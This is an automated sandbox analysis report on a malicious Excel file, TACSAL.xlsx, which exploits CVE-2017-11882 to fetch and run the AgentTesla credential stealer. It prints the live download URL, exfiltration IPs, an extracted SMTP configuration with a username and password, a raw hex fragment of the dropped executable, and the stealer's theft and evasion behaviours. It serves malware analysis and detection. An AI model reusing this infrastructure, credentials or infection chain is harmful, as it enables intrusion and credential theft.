Loading ...

Play interactive tourEdit tour

Analysis Report TACSAL.xlsx

Overview

General Information

Sample Name:TACSAL.xlsx
Analysis ID:344848
MD5:04295ba63eaeb18f062045b0d0106670
SHA1:daf3e6043fa67319bf7090cdc60bec6303c7f78e
SHA256:fbc7b775eaa32cdc8daffe7a3db74bc36e06bab32b53d5d65eceb76081f664cd

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM_3
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2520 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2736 cmdline: 'C:\Users\Public\vbc.exe' MD5: 411FA0337649AD03B57D223E60680397)
      • vbc.exe (PID: 2836 cmdline: C:\Users\Public\vbc.exe MD5: 411FA0337649AD03B57D223E60680397)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "IWR6Nyjr", "URL: ": "https://FTlR0ss5usK.net", "To: ": "facturacion@migeulez.com", "ByHost: ": "smtp.migeulez.com:587", "Password: ": "DjnM0fJ0EN49rH", "From: ": "facturacion@migeulez.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2159933636.00000000023DA000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2736
              Sigma detected: EQNEDT32.EXE connecting to internetShow sources
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.153.76.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2520, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Sigma detected: File Dropped By EQNEDT32EXEShow sources
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
              Sigma detected: Executables Started in Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2736
              Sigma detected: Execution in Non-Executable FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2736
              Sigma detected: Suspicious Program Location Process StartsShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2736

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: http://suresb1sndyintercont.dns.army/receipst/winlog.exeAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: vbc.exe.2836.5.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "IWR6Nyjr", "URL: ": "https://FTlR0ss5usK.net", "To: ": "facturacion@migeulez.com", "ByHost: ": "smtp.migeulez.com:587", "Password: ": "DjnM0fJ0EN49rH", "From: ": "facturacion@migeulez.com"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: http://suresb1sndyintercont.dns.army/receipst/winlog.exeVirustotal: Detection: 10%Perma Link
              Multi AV Scanner detection for submitted fileShow sources
              Source: TACSAL.xlsxVirustotal: Detection: 31%Perma Link
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected

              Exploits:

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

              barindex
              Uses new MSVCR DllsShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
              Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
              Source: global trafficDNS query: name: suresb1sndyintercont.dns.army
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.153.76.181:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.153.76.181:80

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587
              Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49167 -> 208.91.198.143:587
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: https://FTlR0ss5usK.net
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 08:15:44 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Wed, 27 Jan 2021 06:00:08 GMTETag: "106000-5b9db7bb52a00"Accept-Ranges: bytesContent-Length: 1073152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 0f 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c6 0e 00 00 98 01 00 00 00 00 00 9e e5 0e 00 00 20 00 00 00 00 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c e5 0e 00 4f 00 00 00 00 00 0f 00 7c 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 c5 0e 00 00 20 00 00 00 c6 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 95 01 00 00 00 0f 00 00 96 01 00 00 c8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 5e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 e5 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 1c 5c 01 00 03 00 00 00 01 00 00 06 b4 9f 03 00 98 45 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a
              Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
              Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
              Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
              Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.198.143:587
              Source: global trafficHTTP traffic detected: GET /receipst/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: suresb1sndyintercont.dns.armyConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E243FB15.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /receipst/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: suresb1sndyintercont.dns.armyConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: suresb1sndyintercont.dns.army
              Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
              Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpString found in binary or memory: http://GhlhtO.com
              Source: vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: vbc.exe, 00000004.00000002.2159922481.00000000023C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmpString found in binary or memory: http://smtp.migeulez.com
              Source: vbc.exe, 00000005.00000002.2371340918.00000000026D6000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
              Source: vbc.exe, 00000005.00000002.2372183882.0000000005DF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: E243FB15.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
              Source: vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmpString found in binary or memory: https://FTlR0ss5usK.net
              Source: vbc.exe, 00000005.00000002.2371263271.0000000002618000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
              Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
              Source: vbc.exe, 00000004.00000002.2160179580.00000000033C8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2370560370.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: vbc.exe, 00000005.00000002.2371213433.0000000002591000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 19 , yelbw bar above 20 This document is 21 t , 3. Once you have enable
              Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow rabove 23 24 25 26 27 28 29 30 " " " " " 31 0 0 0 0 ~ -
              .NET source code contains very large array initializationsShow sources
              Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bBFB9D646u002dAC94u002d4CA6u002dB029u002d37D6F36F4C26u007d/u0033AB94A16u002dE084u002d41F8u002d8920u002d70575B436CD7.csLarge array initialization: .cctor: array initializer size 11954
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00222148
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00221BA0
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00221E90
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00223AA7
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00223AB8
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00225320
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00226340
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00222089
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00225668
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0022E858
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0070E890
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00705288
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00708960
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00701DD0
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0070BBC0
              Source: C:\Users\Public\vbc.exeCode function: 5_2_0070C990
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00707F88
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00840048
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00844F5F
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00700048
              Source: TACSAL.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: winlog[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: winlog[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@8/3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TACSAL.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: TACSAL.xlsxVirustotal: Detection: 31%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: TACSAL.xlsxStatic file information: File size 2411520 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: TACSAL.xlsxInitial sample: OLE indicators vbamacros = False
              Source: TACSAL.xlsxInitial sample: OLE indicators encrypted = True
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0022CE58 push esp; retf 0022h
              Source: initial sampleStatic PE information: section name: .text entropy: 7.67209039123
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
